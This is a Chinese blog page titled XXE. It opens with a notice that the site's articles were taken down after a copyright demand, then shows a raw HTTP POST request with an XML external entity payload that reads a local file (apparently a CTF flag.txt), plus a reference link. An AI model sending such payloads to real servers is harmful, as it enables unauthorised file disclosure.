当前位置 博文首页 > 文章内容

    XXE

    作者: 栏目:未分类 时间:2020-09-28 18:00:39

    本站于2023年9月4日。收到“大连君*****咨询有限公司”通知
    说我们IIS7站长博客,有一篇博文用了他们的图片。
    要求我们给他们一张图片6000元。要不然法院告我们

    为避免不必要的麻烦,IIS7站长博客,全站内容图片下架、并积极应诉
    博文内容全部不再显示,请需要相关资讯的站长朋友到必应搜索。谢谢!

    另祝:版权碰瓷诈骗团伙,早日弃暗投明。

    相关新闻:借版权之名、行诈骗之实,周某因犯诈骗罪被判处有期徒刑十一年六个月

    叹!百花齐放的时代,渐行渐远!



    POST / HTTP/1.1
    Host: xxx
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/xml
    Content-Length: 145
    Connection: close
    Cookie: PHPSESSID=aro5qb75jpljgc0kenk2g1ef22
    
    <?xml version="1.0" ?>
    <!DOCTYPE foo [
    <!ELEMENT foo ANY >
    <!ENTITY xxe SYSTEM "file:///var/www/html/flag.txt" >]>
    
    <message>&xxe;</message>
    

    参考链接

    先知社区-一篇文章带你深入理解漏洞之 XXE 漏洞